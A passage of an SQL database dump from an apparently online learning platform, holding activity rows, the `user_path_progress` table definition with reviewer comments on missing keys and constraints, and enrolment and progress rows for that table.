(221, 225, 162, 5, '2026-03-05 05:27:14', '2026-03-05 05:27:14'),
(222, 246, 1, 1, '2026-03-05 07:51:20', NULL),
(223, 195, 82, 1, '2026-03-05 08:29:19', '2026-03-05 08:30:59'),
(224, 247, 1, 1, '2026-03-05 11:37:14', NULL),
(225, 248, 1, 3, '2026-03-05 17:39:52', NULL),
(226, 215, 75, 1, '2026-03-05 18:07:05', NULL),
(227, 249, 125, 1, '2026-03-05 19:22:19', '2026-03-05 19:22:49'),
(228, 250, 1, 1, '2026-03-06 02:52:55', NULL),
(229, 251, 1, 3, '2026-03-06 04:45:23', NULL),
(230, 254, 1, 1, '2026-03-06 07:04:42', NULL),
(231, 256, 1, 1, '2026-03-06 08:30:57', NULL),
(232, 257, 135, 1, '2026-03-06 10:17:23', NULL),
(233, 258, 1, 1, '2026-03-06 15:20:34', NULL),
(234, 229, 112, 1, '2026-03-06 20:58:30', '2026-03-06 20:59:55'),
(235, 229, 138, 1, '2026-03-06 21:00:27', '2026-03-06 21:01:18'),
(236, 259, 1, 1, '2026-03-06 21:12:51', NULL),
(237, 142, 1, 2, '2026-03-07 05:16:28', NULL),
(238, 142, 1, 2, '2026-03-07 05:17:51', NULL),
(239, 232, 1, 5, '2026-03-07 08:20:36', '2026-03-07 13:56:20'),
(240, 261, 1, 1, '2026-03-07 08:27:47', NULL),
(241, 260, 1, 1, '2026-03-07 10:22:53', NULL),
(242, 232, 1, 5, '2026-03-07 12:57:07', '2026-03-07 13:56:20'),
(243, 232, 1, 5, '2026-03-07 13:51:15', '2026-03-07 13:56:20'),
(244, 232, 1, 5, '2026-03-07 13:53:28', '2026-03-07 13:56:20'),
(245, 232, 1, 5, '2026-03-07 13:56:20', '2026-03-07 13:56:20'),
(246, 232, 2, 1, '2026-03-07 13:57:28', NULL),
(247, 177, 79, 1, '2026-03-07 19:02:18', '2026-03-07 19:08:33'),
(248, 259, 56, 6, '2026-03-07 19:27:45', NULL),
(249, 259, 13, 1, '2026-03-07 21:16:09', NULL),
(250, 220, 55, 1, '2026-03-08 06:33:20', NULL),
(251, 177, 150, 1, '2026-03-08 11:18:03', '2026-03-08 11:20:12'),
(252, 109, 37, 1, '2026-03-08 12:45:38', '2026-03-08 12:46:46'),
(253, 222, 1, 1, '2026-03-08 14:04:19', NULL),
(254, 78, 143, 1, '2026-03-08 17:54:53', NULL),
(255, 189, 8, 5, '2026-03-08 22:12:30', '2026-03-09 02:59:15'),
(256, 263, 66, 1, '2026-03-08 22:33:13', NULL),
(257, 189, 8, 5, '2026-03-09 02:49:06', '2026-03-09 02:59:15'),
(258, 189, 8, 5, '2026-03-09 02:51:16', '2026-03-09 02:59:15'),
(259, 189, 8, 5, '2026-03-09 02:54:27', '2026-03-09 02:59:15'),
(260, 189, 8, 5, '2026-03-09 02:57:18', '2026-03-09 02:59:15'),
(261, 189, 8, 5, '2026-03-09 02:59:15', '2026-03-09 02:59:15'),
(262, 189, 9, 8, '2026-03-09 02:59:38', NULL),
(263, 189, 9, 8, '2026-03-09 03:01:58', NULL),
(264, 189, 9, 8, '2026-03-09 03:04:18', NULL),
(265, 189, 9, 8, '2026-03-09 03:05:43', NULL),
(266, 189, 9, 8, '2026-03-09 03:06:52', NULL),
(267, 189, 9, 8, '2026-03-09 03:08:15', NULL),
(268, 189, 9, 8, '2026-03-09 03:09:29', NULL),
(269, 189, 9, 8, '2026-03-09 03:10:56', NULL),
(270, 225, 161, 3, '2026-03-09 03:20:49', '2026-03-09 03:23:46'),
(271, 225, 161, 3, '2026-03-09 03:22:28', '2026-03-09 03:23:46'),
(272, 225, 161, 3, '2026-03-09 03:23:46', '2026-03-09 03:23:46'),
(273, 225, 164, 5, '2026-03-09 05:41:53', '2026-03-09 05:46:18'),
(274, 225, 164, 5, '2026-03-09 05:43:01', '2026-03-09 05:46:18'),
(275, 225, 164, 5, '2026-03-09 05:44:07', '2026-03-09 05:46:18'),
(276, 225, 164, 5, '2026-03-09 05:45:12', '2026-03-09 05:46:18'),
(277, 225, 164, 5, '2026-03-09 05:46:18', '2026-03-09 05:46:18'),
(278, 225, 163, 5, '2026-03-09 05:48:52', '2026-03-09 05:52:31'),
(279, 225, 163, 5, '2026-03-09 05:49:52', '2026-03-09 05:52:31'),
(280, 225, 163, 5, '2026-03-09 05:50:40', '2026-03-09 05:52:31'),
(281, 225, 163, 5, '2026-03-09 05:51:41', '2026-03-09 05:52:31'),
(282, 225, 163, 5, '2026-03-09 05:52:31', '2026-03-09 05:52:31'),
(283, 225, 160, 2, '2026-03-09 05:55:22', NULL),
(284, 264, 30, 1, '2026-03-09 09:41:46', '2026-03-09 09:42:50'),
(285, 266, 1, 1, '2026-03-09 12:23:18', NULL),
(286, 55, 1, 1, '2026-03-09 12:47:22', NULL),
(287, 195, 24, 1, '2026-03-09 20:53:23', '2026-03-09 20:55:41'),
(288, 195, 95, 1, '2026-03-09 21:00:43', '2026-03-09 21:02:27'),
(289, 34, 128, 1, '2026-03-10 01:19:33', NULL),
(290, 269, 4, 1, '2026-03-10 03:44:20', '2026-03-10 03:44:48'),
(291, 271, 1, 1, '2026-03-10 05:08:11', NULL),
(292, 251, 1, 3, '2026-03-10 05:22:50', NULL),
(293, 251, 1, 3, '2026-03-10 05:25:26', NULL),
(294, 251, 1, 3, '2026-03-10 05:28:29', NULL),
(295, 266, 108, 1, '2026-03-10 14:40:29', '2026-03-10 14:42:57'),
(296, 225, 166, 5, '2026-03-10 22:18:34', '2026-03-10 22:23:21'),
(297, 225, 166, 5, '2026-03-10 22:19:55', '2026-03-10 22:23:21'),
(298, 225, 166, 5, '2026-03-10 22:20:40', '2026-03-10 22:23:21'),
(299, 225, 166, 5, '2026-03-10 22:22:20', '2026-03-10 22:23:21'),
(300, 225, 166, 5, '2026-03-10 22:23:21', '2026-03-10 22:23:21'),
(301, 229, 1, 2, '2026-03-11 01:20:21', NULL),
(302, 229, 1, 2, '2026-03-11 01:22:29', NULL),
(303, 34, 166, 1, '2026-03-11 02:54:56', NULL),
(304, 225, 165, 5, '2026-03-11 03:20:47', '2026-03-11 03:44:56'),
(305, 225, 165, 5, '2026-03-11 03:21:50', '2026-03-11 03:44:56'),
(306, 225, 165, 5, '2026-03-11 03:23:02', '2026-03-11 03:44:56'),
(307, 225, 165, 5, '2026-03-11 03:43:39', '2026-03-11 03:44:56'),
(308, 225, 165, 5, '2026-03-11 03:44:56', '2026-03-11 03:44:56'),
(309, 177, 70, 1, '2026-03-11 07:08:58', '2026-03-11 07:09:54'),
(310, 277, 1, 1, '2026-03-11 11:47:29', NULL),
(311, 195, 95, 1, '2026-03-11 12:01:20', NULL),
(312, 279, 57, 1, '2026-03-11 13:41:48', '2026-03-11 13:43:29'),
(313, 232, 165, 5, '2026-03-11 17:51:38', '2026-03-11 17:57:53'),
(314, 232, 165, 5, '2026-03-11 17:53:44', '2026-03-11 17:57:53'),
(315, 232, 165, 5, '2026-03-11 17:55:37', '2026-03-11 17:57:53'),
(316, 232, 165, 5, '2026-03-11 17:56:13', '2026-03-11 17:57:53'),
(317, 232, 165, 5, '2026-03-11 17:57:53', '2026-03-11 17:57:53'),
(318, 102, 61, 1, '2026-03-11 20:38:06', NULL),
(319, 34, 78, 1, '2026-03-11 22:44:51', NULL),
(320, 282, 1, 1, '2026-03-11 23:46:37', NULL),
(321, 283, 1, 1, '2026-03-11 23:58:53', NULL),
(322, 284, 14, 1, '2026-03-12 04:48:50', '2026-03-12 04:50:23'),
(323, 285, 108, 1, '2026-03-12 07:20:28', '2026-03-12 07:25:26'),
(324, 285, 1, 1, '2026-03-12 07:27:36', NULL),
(325, 281, 1, 1, '2026-03-12 09:53:38', NULL),
(326, 289, 1, 1, '2026-03-12 10:05:59', NULL),
(327, 290, 1, 1, '2026-03-12 13:52:27', NULL),
(328, 290, 18, 1, '2026-03-12 15:08:59', NULL),
(329, 287, 1, 1, '2026-03-12 16:02:59', NULL),
(330, 283, 166, 5, '2026-03-12 20:09:56', '2026-03-12 20:20:53'),
(331, 283, 166, 5, '2026-03-12 20:15:07', '2026-03-12 20:20:53'),
(332, 283, 166, 5, '2026-03-12 20:17:58', '2026-03-12 20:20:53'),
(333, 283, 166, 5, '2026-03-12 20:19:56', '2026-03-12 20:20:53'),
(334, 283, 166, 5, '2026-03-12 20:20:53', '2026-03-12 20:20:53'),
(335, 34, 118, 1, '2026-03-12 22:00:22', NULL),
(336, 182, 123, 1, '2026-03-13 02:32:26', NULL),
(337, 102, 95, 1, '2026-03-13 10:06:25', NULL),
(378, 283, 179, 5, '2026-03-15 20:17:28', '2026-03-15 20:36:10'),
(339, 248, 1, 3, '2026-03-13 13:32:23', NULL),
(340, 248, 1, 3, '2026-03-13 13:40:59', NULL),
(341, 232, 161, 3, '2026-03-13 16:22:18', '2026-03-14 04:35:08'),
(342, 180, 62, 1, '2026-03-13 18:04:38', '2026-03-13 18:05:21'),
(343, 248, 1, 3, '2026-03-13 21:40:22', NULL),
(344, 232, 161, 3, '2026-03-14 04:34:04', '2026-03-14 04:35:08'),
(345, 232, 161, 3, '2026-03-14 04:35:08', '2026-03-14 04:35:08'),
(346, 99, 141, 1, '2026-03-14 07:37:09', NULL),
(347, 296, 8, 1, '2026-03-14 16:34:55', '2026-03-14 16:35:45'),
(348, 297, 1, 1, '2026-03-14 16:38:17', NULL),
(349, 232, 160, 5, '2026-03-14 16:41:24', NULL),
(350, 232, 160, 5, '2026-03-14 16:42:02', NULL),
(351, 232, 160, 5, '2026-03-14 16:42:29', NULL),
(352, 232, 160, 5, '2026-03-14 16:43:07', NULL),
(353, 229, 156, 1, '2026-03-14 18:02:15', '2026-03-14 18:04:20'),
(354, 298, 1, 1, '2026-03-14 18:38:47', NULL),
(355, 296, 1, 1, '2026-03-14 21:29:35', NULL),
(356, 296, 166, 1, '2026-03-14 21:33:53', NULL),
(357, 300, 1, 1, '2026-03-14 23:29:22', NULL),
(358, 187, 25, 1, '2026-03-15 03:13:10', '2026-03-15 03:14:58'),
(359, 177, 73, 1, '2026-03-15 04:18:37', '2026-03-15 04:21:53'),
(360, 78, 119, 1, '2026-03-15 05:42:51', NULL),
(377, 283, 179, 5, '2026-03-15 20:07:37', '2026-03-15 20:36:10'),
(362, 266, 1, 1, '2026-03-15 14:44:25', NULL),
(363, 303, 1, 5, '2026-03-15 17:13:19', '2026-03-15 17:56:13'),
(364, 304, 1, 1, '2026-03-15 17:29:01', NULL),
(365, 303, 1, 5, '2026-03-15 17:49:09', '2026-03-15 17:56:13'),
(366, 303, 1, 5, '2026-03-15 17:51:04', '2026-03-15 17:56:13'),
(367, 303, 1, 5, '2026-03-15 17:53:04', '2026-03-15 17:56:13'),
(368, 303, 1, 5, '2026-03-15 17:54:52', '2026-03-15 17:56:13'),
(369, 305, 69, 1, '2026-03-15 17:56:02', '2026-03-15 17:57:35'),
(370, 303, 1, 5, '2026-03-15 17:56:13', '2026-03-15 17:56:13'),
(371, 303, 2, 4, '2026-03-15 17:56:25', '2026-03-15 18:00:55'),
(372, 303, 2, 4, '2026-03-15 17:57:42', '2026-03-15 18:00:55'),
(373, 303, 2, 4, '2026-03-15 17:58:57', '2026-03-15 18:00:55'),
(374, 303, 2, 4, '2026-03-15 17:59:57', '2026-03-15 18:00:55'),
(375, 303, 2, 4, '2026-03-15 18:00:55', '2026-03-15 18:00:55'),
(376, 303, 3, 1, '2026-03-15 18:01:05', NULL),
(379, 283, 179, 5, '2026-03-15 20:25:56', '2026-03-15 20:36:10'),
(380, 283, 179, 5, '2026-03-15 20:32:32', '2026-03-15 20:36:10'),
(381, 283, 179, 5, '2026-03-15 20:35:15', '2026-03-15 20:36:10'),
(382, 283, 179, 5, '2026-03-15 20:36:10', '2026-03-15 20:36:10'),
(383, 283, 193, 4, '2026-03-15 20:39:12', NULL),
(384, 283, 193, 4, '2026-03-15 20:41:39', NULL),
(385, 283, 193, 4, '2026-03-15 20:43:16', NULL),
(386, 283, 193, 4, '2026-03-15 20:44:55', NULL),
(387, 28, 1, 3, '2026-03-15 21:09:16', NULL),
(388, 28, 1, 3, '2026-03-15 21:12:22', NULL),
(389, 28, 1, 3, '2026-03-15 21:14:03', NULL),
(390, 28, 1, 3, '2026-03-15 21:15:06', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `user_path_progress`
--

-- One row per (user, learning path) enrolment: when the user enrolled, how far
-- they are, and when/if they completed it.
-- NOTE(review): only column definitions are declared here; no PRIMARY KEY,
-- UNIQUE, FOREIGN KEY or CHECK constraint is visible in this statement.
-- phpMyAdmin normally emits keys and AUTO_INCREMENT in later "Indexes" /
-- "AUTO_INCREMENT" sections of the dump -- confirm they exist for this table
-- before relying on any of the integrity assumptions noted below.
CREATE TABLE `user_path_progress` (
  -- Row id. No AUTO_INCREMENT / PRIMARY KEY inline; presumably added later in
  -- the dump -- verify, otherwise duplicate ids are possible.
  `id` int(11) NOT NULL,
  -- Enrolled user. No FOREIGN KEY visible here; nothing in this DDL prevents a
  -- row for a non-existent or deleted user.
  `user_id` int(11) NOT NULL,
  -- Enrolled learning path. Same caveat as user_id: no FK visible here.
  `learning_path_id` int(11) NOT NULL,
  -- Enrolment instant; defaults to the insert time. The explicit NULL matters:
  -- on MariaDB with the default explicit_defaults_for_timestamp=OFF a bare
  -- `timestamp` column would be implicitly NOT NULL.
  `enrolled_at` timestamp NULL DEFAULT current_timestamp(),
  -- Completion instant; NULL while the path is unfinished. Nothing in the
  -- schema ties this to percentage_completed reaching 100 -- the application
  -- is the only thing keeping the two consistent.
  `completed_at` timestamp NULL DEFAULT NULL,
  -- Progress in percent, two decimals. No CHECK constraint, so values outside
  -- 0.00..100.00 are accepted at the schema level; the rows dumped below all
  -- fall within that range. If completion (and any certificate) is derived
  -- from this value, enforce the range in the app or via a CHECK.
  `percentage_completed` decimal(5,2) DEFAULT 0.00,
  -- Last module the user was on; nullable, no FK visible here.
  `current_module_id` int(11) DEFAULT NULL,
  -- Audit timestamps; updated_at is refreshed by the engine on every UPDATE.
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `updated_at` timestamp NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  -- Free-form certificate reference; NULL in every row dumped below. No UNIQUE
  -- constraint is visible here. If this string is handed to users as a
  -- verifiable certificate identifier, it should be unguessable (random, not
  -- sequential) and unique -- TODO confirm how the application generates it.
  `certificate_id` varchar(255) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

--
-- Dumping data for table `user_path_progress`
--

INSERT INTO `user_path_progress` (`id`, `user_id`, `learning_path_id`, `enrolled_at`, `completed_at`, `percentage_completed`, `current_module_id`, `created_at`, `updated_at`, `certificate_id`) VALUES
(1, 34, 1, '2025-12-26 00:53:30', NULL, 29.55, NULL, '2025-12-26 00:53:30', '2025-12-26 20:46:41', NULL),
(2, 34, 2, '2025-12-26 02:54:35', NULL, 1.33, NULL, '2025-12-26 02:54:35', '2025-12-26 21:14:00', NULL),
(3, 34, 3, '2025-12-26 03:17:44', NULL, 0.00, NULL, '2025-12-26 03:17:44', '2025-12-26 03:17:44', NULL),
(5, 34, 4, '2025-12-26 03:17:47', NULL, 0.00, NULL, '2025-12-26 03:17:47', '2025-12-26 03:17:47', NULL),
(8, 1, 2, '2025-12-26 10:00:57', NULL, 0.00, NULL, '2025-12-26 10:00:57', '2025-12-26 10:00:57', NULL),
(10, 1, 4, '2025-12-26 14:08:00', NULL, 0.00, NULL, '2025-12-26 14:08:00', '2025-12-26 14:08:00', NULL),
(11, 1, 3, '2025-12-26 14:09:43', NULL, 0.00, NULL, '2025-12-26 14:09:43', '2025-12-26 14:09:43', NULL),
(12, 1, 1, '2025-12-26 15:33:20', NULL, 0.00, NULL, '2025-12-26 15:33:20', '2025-12-26 15:33:20', NULL),
(13, 34, 5, '2025-12-26 17:59:48', NULL, 8.00, NULL, '2025-12-26 17:59:48', '2025-12-29 03:18:58', NULL),
(14, 1, 5, '2025-12-27 03:06:50', NULL, 0.00, NULL, '2025-12-27 03:06:50', '2025-12-29 03:18:58', NULL),
(15, 39, 5, '2025-12-27 03:56:25', NULL, 0.00, NULL, '2025-12-27 03:56:25', '2025-12-29 03:18:58', NULL),
(16, 40, 5, '2025-12-27 04:13:07', NULL, 0.00, NULL, '2025-12-27 04:13:07', '2025-12-29 03:18:58', NULL),
(17, 40, 1, '2025-12-27 04:19:13', NULL, 0.00, NULL, '2025-12-27 04:19:13', '2025-12-27 04:19:13', NULL),
(18, 41, 5, '2025-12-27 10:28:37', NULL, 0.00, NULL, '2025-12-27 10:28:37', '2025-12-29 03:18:58', NULL),
(19, 42, 5, '2025-12-27 11:49:51', NULL, 0.00, NULL, '2025-12-27 11:49:51', '2025-12-29 03:18:58', NULL),
(20, 42, 1, '2025-12-27 12:42:27', NULL, 28.57, NULL, '2025-12-27 12:42:27', '2025-12-30 13:53:51', NULL),
(23, 44, 5, '2025-12-27 20:59:19', NULL, 0.00, NULL, '2025-12-27 20:59:19', '2025-12-29 03:18:58', NULL),
(24, 44, 1, '2025-12-27 21:00:51', NULL, 0.00, NULL, '2025-12-27 21:00:51', '2025-12-27 21:00:51', NULL),
(25, 45, 5, '2025-12-28 17:13:10', NULL, 0.00, NULL, '2025-12-28 17:13:10', '2025-12-29 03:18:58', NULL),
(26, 45, 4, '2025-12-28 17:13:28', NULL, 0.00, NULL, '2025-12-28 17:13:28', '2025-12-28 17:13:28', NULL),
(30, 49, 5, '2025-12-28 19:54:53', NULL, 0.00, NULL, '2025-12-28 19:54:53', '2025-12-29 03:18:58', NULL),
(31, 50, 5, '2025-12-28 21:32:20', NULL, 0.00, NULL, '2025-12-28 21:32:20', '2025-12-29 03:18:58', NULL),
(32, 51, 5, '2025-12-28 21:55:58', NULL, 0.00, NULL, '2025-12-28 21:55:58', '2025-12-29 03:18:58', NULL),
(35, 51, 1, '2025-12-28 22:32:39', NULL, 0.00, NULL, '2025-12-28 22:32:39', '2025-12-28 22:32:39', NULL),
(36, 52, 5, '2025-12-29 00:28:27', NULL, 0.00, NULL, '2025-12-29 00:28:27', '2025-12-29 03:18:58', NULL),
(44, 52, 1, '2025-12-29 08:09:40', NULL, 0.00, NULL, '2025-12-29 08:09:40', '2025-12-29 08:09:40', NULL),
(45, 1, 6, '2025-12-29 13:51:54', NULL, 3.85, NULL, '2025-12-29 13:51:54', '2025-12-29 13:53:27', NULL),
(46, 1, 9, '2025-12-29 16:24:12', NULL, 0.00, NULL, '2025-12-29 16:24:12', '2025-12-29 16:24:12', NULL),
(47, 54, 9, '2025-12-29 21:29:25', NULL, 0.00, NULL, '2025-12-29 21:29:25', '2025-12-29 21:29:25', NULL),
(48, 54, 1, '2025-12-29 22:40:53', NULL, 0.00, NULL, '2025-12-29 22:40:53', '2025-12-29 22:40:53', NULL),
(49, 55, 9, '2025-12-31 01:11:23', NULL, 0.00, NULL, '2025-12-31 01:11:23', '2025-12-31 01:11:23', NULL),
(50, 56, 9, '2025-12-31 07:24:05', NULL, 0.00, NULL, '2025-12-31 07:24:05', '2025-12-31 07:24:05', NULL),
(52, 56, 4, '2025-12-31 07:27:27', NULL, 0.00, NULL, '2025-12-31 07:27:27', '2025-12-31 07:27:27', NULL),
(53, 56, 6, '2025-12-31 07:28:39', NULL, 0.00, NULL, '2025-12-31 07:28:39', '2025-12-31 07:28:39', NULL),
(54, 56, 2, '2025-12-31 07:28:43', NULL, 0.00, NULL, '2025-12-31 07:28:43', '2025-12-31 07:28:43', NULL),
(55, 58, 9, '2025-12-31 14:33:15', NULL, 0.00, NULL, '2025-12-31 14:33:15', '2025-12-31 14:33:15', NULL),
(57, 60, 9, '2026-01-02 00:49:19', NULL, 0.00, NULL, '2026-01-02 00:49:19', '2026-01-02 00:49:19', NULL),
(58, 61, 9, '2026-01-02 06:46:42', NULL, 0.00, NULL, '2026-01-02 06:46:42', '2026-01-02 06:46:42', NULL),
(59, 61, 1, '2026-01-02 06:49:58', NULL, 0.00, NULL, '2026-01-02 06:49:58', '2026-01-02 06:49:58', NULL),
(60, 62, 9, '2026-01-02 11:36:35', NULL, 0.00, NULL, '2026-01-02 11:36:35', '2026-01-02 11:36:35', NULL),
(62, 64, 9, '2026-01-03 21:32:47', NULL, 0.00, NULL, '2026-01-03 21:32:47', '2026-01-03 21:32:47', NULL),
(63, 49, 1, '2026-01-04 22:28:44', NULL, 0.00, NULL, '2026-01-04 22:28:44', '2026-01-04 22:28:44', NULL),
(64, 61, 4, '2026-01-05 11:09:23', NULL, 0.00, NULL, '2026-01-05 11:09:23', '2026-01-05 11:09:23', NULL),
(65, 34, 9, '2026-01-06 00:39:27', NULL, 27.27, NULL, '2026-01-06 00:39:27', '2026-02-05 19:28:01', NULL),
(66, 65, 9, '2026-01-06 06:39:55', NULL, 0.00, NULL, '2026-01-06 06:39:55', '2026-01-06 06:39:55', NULL),
(67, 65, 3, '2026-01-06 06:49:34', NULL, 0.00, NULL, '2026-01-06 06:49:34', '2026-01-06 06:49:34', NULL),
(68, 65, 4, '2026-01-06 06:56:51', NULL, 0.00, NULL, '2026-01-06 06:56:51', '2026-01-06 06:56:51', NULL),
(69, 65, 1, '2026-01-06 07:02:18', NULL, 2.38, NULL, '2026-01-06 07:02:18', '2026-01-06 16:28:31', NULL),
(70, 65, 2, '2026-01-06 07:02:49', NULL, 0.00, NULL, '2026-01-06 07:02:49', '2026-01-06 07:02:49', NULL),
(71, 65, 6, '2026-01-06 08:12:49', NULL, 0.00, NULL, '2026-01-06 08:12:49', '2026-01-06 08:12:49', NULL),
(73, 67, 9, '2026-01-07 03:07:05', NULL, 0.00, NULL, '2026-01-07 03:07:05', '2026-01-07 03:07:05', NULL),
(74, 68, 9, '2026-01-07 15:58:56', NULL, 0.00, NULL, '2026-01-07 15:58:56', '2026-01-07 15:58:56', NULL),
(75, 68, 1, '2026-01-07 16:03:06', NULL, 0.00, NULL, '2026-01-07 16:03:06', '2026-01-07 16:03:06', NULL),
(77, 70, 9, '2026-01-08 14:51:54', NULL, 0.00, NULL, '2026-01-08 14:51:54', '2026-01-08 14:51:54', NULL),
(78, 71, 9, '2026-01-10 06:32:03', NULL, 0.00, NULL, '2026-01-10 06:32:03', '2026-01-10 06:32:03', NULL),
(79, 72, 9, '2026-01-10 14:11:37', NULL, 0.00, NULL, '2026-01-10 14:11:37', '2026-01-10 14:11:37', NULL),
(80, 72, 1, '2026-01-10 14:19:22', NULL, 0.00, NULL, '2026-01-10 14:19:22', '2026-01-10 14:19:22', NULL),
(81, 74, 9, '2026-01-12 06:23:29', NULL, 0.00, NULL, '2026-01-12 06:23:29', '2026-01-12 06:23:29', NULL),
(82, 74, 1, '2026-01-12 06:28:49', NULL, 11.90, NULL, '2026-01-12 06:28:49', '2026-01-17 08:41:02', NULL),
(83, 74, 4, '2026-01-12 06:34:41', NULL, 0.00, NULL, '2026-01-12 06:34:41', '2026-01-12 06:34:41', NULL),
(84, 74, 2, '2026-01-12 06:48:04', NULL, 1.54, NULL, '2026-01-12 06:48:04', '2026-01-12 06:52:12', NULL),
(85, 74, 3, '2026-01-12 06:52:55', NULL, 0.00, NULL, '2026-01-12 06:52:55', '2026-01-12 06:52:55', NULL),
(86, 74, 6, '2026-01-12 06:54:50', NULL, 0.00, NULL, '2026-01-12 06:54:50', '2026-01-12 06:54:50', NULL),
(89, 77, 9, '2026-01-14 00:44:04', NULL, 0.00, NULL, '2026-01-14 00:44:04', '2026-01-14 00:44:04', NULL),
(90, 78, 9, '2026-01-14 03:21:01', NULL, 0.00, NULL, '2026-01-14 03:21:01', '2026-01-14 03:21:01', NULL),
(91, 79, 9, '2026-01-15 22:38:58', NULL, 0.00, NULL, '2026-01-15 22:38:58', '2026-01-15 22:38:58', NULL),
(95, 83, 9, '2026-01-16 00:10:32', NULL, 0.00, NULL, '2026-01-16 00:10:32', '2026-01-16 00:10:32', NULL),
(96, 84, 9, '2026-01-16 00:13:19', NULL, 0.00, NULL, '2026-01-16 00:13:19', '2026-01-16 00:13:19', NULL),
(97, 85, 9, '2026-01-16 13:32:57', NULL, 0.00, NULL, '2026-01-16 13:32:57', '2026-01-16 13:32:57', NULL),
(98, 86, 9, '2026-01-16 18:33:57', NULL, 0.00, NULL, '2026-01-16 18:33:57', '2026-01-16 18:33:57', NULL),
(100, 88, 9, '2026-01-18 15:25:44', NULL, 0.00, NULL, '2026-01-18 15:25:44', '2026-01-18 15:25:44', NULL),
(101, 89, 9, '2026-01-20 00:24:47', NULL, 0.00, NULL, '2026-01-20 00:24:47', '2026-01-20 00:24:47', NULL),
(103, 91, 9, '2026-01-20 10:34:28', NULL, 0.00, NULL, '2026-01-20 10:34:28', '2026-01-20 10:34:28', NULL),
(104, 91, 6, '2026-01-20 10:42:41', NULL, 0.00, NULL, '2026-01-20 10:42:41', '2026-01-20 10:42:41', NULL),
(106, 93, 9, '2026-01-20 20:53:45', NULL, 0.00, NULL, '2026-01-20 20:53:45', '2026-01-20 20:53:45', NULL),
(107, 94, 9, '2026-01-21 01:56:47', NULL, 0.00, NULL, '2026-01-21 01:56:47', '2026-01-21 01:56:47', NULL),
(108, 94, 1, '2026-01-21 01:58:13', NULL, 0.00, NULL, '2026-01-21 01:58:13', '2026-01-21 01:58:13', NULL),
(109, 95, 9, '2026-01-21 17:16:55', NULL, 0.00, NULL, '2026-01-21 17:16:55', '2026-01-21 17:16:55', NULL),
(110, 95, 4, '2026-01-21 18:33:45', NULL, 0.00, NULL, '2026-01-21 18:33:45', '2026-01-21 18:33:45', NULL),
(111, 95, 1, '2026-01-21 18:34:31', NULL, 0.00, NULL, '2026-01-21 18:34:31', '2026-01-21 18:34:31', NULL),
(112, 96, 9, '2026-01-22 04:10:46', NULL, 0.00, NULL, '2026-01-22 04:10:46', '2026-01-22 04:10:46', NULL),
(113, 97, 9, '2026-01-25 05:03:59', NULL, 0.00, NULL, '2026-01-25 05:03:59', '2026-01-25 05:03:59', NULL),
(114, 98, 9, '2026-01-25 08:17:43', NULL, 0.00, NULL, '2026-01-25 08:17:43', '2026-01-25 08:17:43', NULL),
(115, 98, 1, '2026-01-25 08:39:22', NULL, 0.00, NULL, '2026-01-25 08:39:22', '2026-01-25 08:39:22', NULL),
(116, 99, 9, '2026-01-25 15:12:11', NULL, 0.00, NULL, '2026-01-25 15:12:11', '2026-01-25 15:12:11', NULL),
(117, 100, 9, '2026-01-25 19:36:46', NULL, 0.00, NULL, '2026-01-25 19:36:46', '2026-01-25 19:36:46', NULL),
(118, 101, 9, '2026-01-25 21:03:19', NULL, 0.00, NULL, '2026-01-25 21:03:19', '2026-01-25 21:03:19', NULL),
(119, 102, 9, '2026-01-25 21:54:58', NULL, 0.00, NULL, '2026-01-25 21:54:58', '2026-01-25 21:54:58', NULL),
(120, 103, 9, '2026-01-26 01:31:17', NULL, 0.00, NULL, '2026-01-26 01:31:17', '2026-01-26 01:31:17', NULL),
(122, 105, 9, '2026-01-26 03:43:19', NULL, 0.00, NULL, '2026-01-26 03:43:19', '2026-01-26 03:43:19', NULL),
(123, 106, 9, '2026-01-26 04:14:59', NULL, 0.00, NULL, '2026-01-26 04:14:59', '2026-01-26 04:14:59', NULL),
(124, 107, 9, '2026-01-27 19:39:38', NULL, 0.00, NULL, '2026-01-27 19:39:38', '2026-01-27 19:39:38', NULL),
(125, 108, 9, '2026-01-27 19:55:48', NULL, 0.00, NULL, '2026-01-27 19:55:48', '2026-01-27 19:55:48', NULL),
(126, 108, 1, '2026-01-27 19:56:32', NULL, 0.00, NULL, '2026-01-27 19:56:32', '2026-01-27 19:56:32', NULL),
(127, 107, 1, '2026-01-27 19:56:48', NULL, 11.90, NULL, '2026-01-27 19:56:48', '2026-02-02 15:27:10', NULL),
(128, 109, 9, '2026-01-27 21:06:54', NULL, 0.00, NULL, '2026-01-27 21:06:54', '2026-01-27 21:06:54', NULL),
(129, 107, 3, '2026-01-28 14:33:42', NULL, 0.00, NULL, '2026-01-28 14:33:42', '2026-01-28 14:33:42', NULL),
(130, 110, 9, '2026-01-30 13:36:09', NULL, 0.00, NULL, '2026-01-30 13:36:09', '2026-01-30 13:36:09', NULL),
(131, 111, 9, '2026-01-30 14:52:08', NULL, 0.00, NULL, '2026-01-30 14:52:08', '2026-01-30 14:52:08', NULL),
(132, 112, 9, '2026-01-30 14:53:28', NULL, 0.00, NULL, '2026-01-30 14:53:28', '2026-01-30 14:53:28', NULL),
(133, 113, 9, '2026-01-30 14:55:24', NULL, 0.00, NULL, '2026-01-30 14:55:24', '2026-01-30 14:55:24', NULL),
(134, 114, 9, '2026-01-30 14:57:24', NULL, 0.00, NULL, '2026-01-30 14:57:24', '2026-01-30 14:57:24', NULL),
(135, 115, 9, '2026-01-31 12:37:56', NULL, 0.00, NULL, '2026-01-31 12:37:56', '2026-01-31 12:37:56', NULL),
(136, 116, 9, '2026-02-01 09:06:04', NULL, 0.00, NULL, '2026-02-01 09:06:04', '2026-02-01 09:06:04', NULL),
(137, 116, 4, '2026-02-01 09:07:29', NULL, 0.00, NULL, '2026-02-01 09:07:29', '2026-02-01 09:07:29', NULL),
(138, 116, 2, '2026-02-01 09:08:21', NULL, 0.00, NULL, '2026-02-01 09:08:21', '2026-02-01 09:08:21', NULL),
(139, 116, 3, '2026-02-01 09:08:38', NULL, 0.00, NULL, '2026-02-01 09:08:38', '2026-02-01 09:08:38', NULL),
(140, 116, 1, '2026-02-01 09:08:49', NULL, 0.00, NULL, '2026-02-01 09:08:49', '2026-02-01 09:08:49', NULL),
(141, 117, 9, '2026-02-01 16:19:53', NULL, 0.00, NULL, '2026-02-01 16:19:53', '2026-02-01 16:19:53', NULL),
